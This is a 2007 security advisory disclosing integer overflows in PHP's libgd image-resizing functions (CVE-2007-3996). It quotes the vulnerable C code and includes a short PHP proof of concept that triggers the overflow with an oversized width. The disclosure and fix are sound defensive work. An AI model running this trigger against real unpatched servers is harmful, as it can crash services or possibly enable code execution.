PHP ImageCopyResized/ImageCopyResampled Integer Overflow

Affected Products:
<= PHP 5.2.3

Authors:
Mattias Bengtsson <mattias@secweb.se>
Philip Olausson <po@secweb.se>

Reported:
2007-06-05

Released:
2007-08-30

CVE:
CVE-2007-3996

Issue:

Two integer overflows exists in PHP's implementation of libgd. Remote exploitation of this overflow may under some circumstances allow execution of arbitrary code.

Description:

PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. libgd is used for dynamic creation of images.

Details:

The overflow is located in the function gdImageCopyResized(). Which are used within the PHP code and can also be reached from PHP using imagecopyresized() or imagecopyresampled().

...

stx = (int *) gdMalloc (sizeof (int) * srcW);
sty = (int *) gdMalloc (sizeof (int) * srcH);

...

for (i = 0; (i < srcW); i++) {
	stx[i] = dstW * (i+1) / srcW - dstW * i / srcW ;
}
for (i = 0; (i < srcH); i++) {
	sty[i] = dstH * (i+1) / srcH - dstH * i / srcH ;
}

...
	

Passing a high value of srcW or srcH results in a integer overflow when allocating the buffer for stx and sty. The for-loops occuring after the allocation will then try to write a big amout of data that will result in a crash or possible execution of arbitrary code.

If a web application use this function for resizing images that could be uploaded remotely, the overflow can be triggered by a specially crafted image file.

Proof Of Concepts:

<?php

imagecopyresized(imagecreatetruecolor(0x7fffffff, 120),
                imagecreatetruecolor(120, 120),
                0, 0, 0, 0, 0x7fffffff, 120, 120, 120);

?>

Impact:

Due to the fact that this vulnerability can be triggered remotely the impact should be considered high.

Solution:

Upgrade to PHP 5.2.4